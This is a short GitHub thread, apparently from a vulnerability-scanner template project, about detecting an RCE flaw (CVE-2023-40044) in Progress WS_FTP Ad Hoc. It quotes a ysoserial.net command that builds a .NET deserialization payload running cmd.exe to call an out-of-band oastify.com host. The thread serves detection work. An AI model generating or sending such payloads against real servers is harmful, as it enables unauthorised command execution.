CVE-2023-40044 #8296

Closed

@johnk3r (Contributor) commented Oct 1, 2023

Template / PR Information

RCE in Progress WS_FTP Ad Hoc via IIS HTTP Modules

References:
https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044

I've validated this template locally:
Needs some improvements and payload generation/validation.

DhiyaneshGeek self-assigned this Oct 1, 2023

@ehsandeep (Member)

@johnk3r this will require payload generation from https://github.com/pwntester/ysoserial.net

@johnk3r (Contributor, Author) commented Oct 1, 2023

> @johnk3r this will require payload generation from https://github.com/pwntester/ysoserial.net

Thank you for the warning. I noticed that something wasn't right with "generate_java_gadget".

@AkechiShiro

@ehsandeep could you describe a bit more what's needed for the payload generation needed from ysoserial?

Because there is a plugin DotNetNuke (targeting an old CVE) that exists and there are also a lot of gadgets (that can be generated)

@AkechiShiro

Found an example in the ref linked here: ./ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "cmd.exe /C nslookup wuui3r1tbpx4pwl6ao5dztkiq9w2ks8h.oastify.com" -o base64

DhiyaneshGeek added the "Status: On Hold" label Oct 18, 2023

johnk3r closed this Nov 14, 2023